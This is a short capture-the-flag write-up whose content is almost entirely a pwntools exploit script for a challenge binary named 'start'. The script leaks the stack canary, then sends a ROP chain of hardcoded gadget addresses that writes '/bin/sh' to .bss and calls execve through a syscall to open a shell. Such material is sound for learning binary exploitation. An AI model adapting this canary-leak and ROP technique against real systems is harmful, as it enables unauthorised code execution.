It was ROP using syscall.
I had been meaning to solve this one for a long time, and today I finally solved it.
```python
from pwn import *

context.log_level = 'debug'
p = process("./start")

# Addresses in the statically linked binary (taken from the write-up)
read = 0x440300            # read() inside the binary
bss = 0x6cdb68             # writable .bss area used to hold "/bin/sh"
syscall = 0x468e75         # syscall; ret
prdi = 0x4005d5            # pop rdi; ret
prsi = 0x4017f7            # pop rsi; ret
prdx = 0x443776            # pop rdx; ret
prax_rdx_rbx = 0x47a6e6    # pop rax; pop rdx; pop rbx; ret

# Stage 1: leak the canary. 25 bytes overwrite the canary's null low byte,
# so the echoed buffer carries the remaining 7 canary bytes.
pay1 = b"a" * 25
p.send(pay1)
p.recvuntil(b"a" * 24)
canary = u64(p.recv(8)) - 0x61   # undo the 'a' (0x61) that replaced the low byte
log.info("canary = " + hex(canary))

# Stage 2: intact canary, dummy saved rbp, then the ROP chain
pay2 = b"a" * 24
pay2 += p64(canary)
pay2 += b"b" * 8               # saved rbp
# read(0, bss, 8): store "/bin/sh\x00" in .bss
pay2 += p64(prdi)
pay2 += p64(0)
pay2 += p64(prsi)
pay2 += p64(bss)
pay2 += p64(prdx)
pay2 += p64(8)
pay2 += p64(read)
# syscall setting: execve("/bin/sh", bss+100, NULL)
pay2 += p64(prax_rdx_rbx)
pay2 += p64(59)                # rax = SYS_execve
pay2 += p64(0)                 # rdx = envp = NULL
pay2 += p64(bss + 100)         # rbx (unused)
pay2 += p64(prdi)
pay2 += p64(bss)               # rdi = pointer to "/bin/sh"
pay2 += p64(prsi)
pay2 += p64(bss + 100)         # rsi = argv (zero-filled .bss, i.e. argv[0] == NULL)
pay2 += p64(syscall)
p.sendline(pay2)
p.sendline(b"exit")            # make the vulnerable function return so the chain runs
p.sendline(b"/bin/sh\x00")     # consumed by read(0, bss, 8)
p.interactive()
```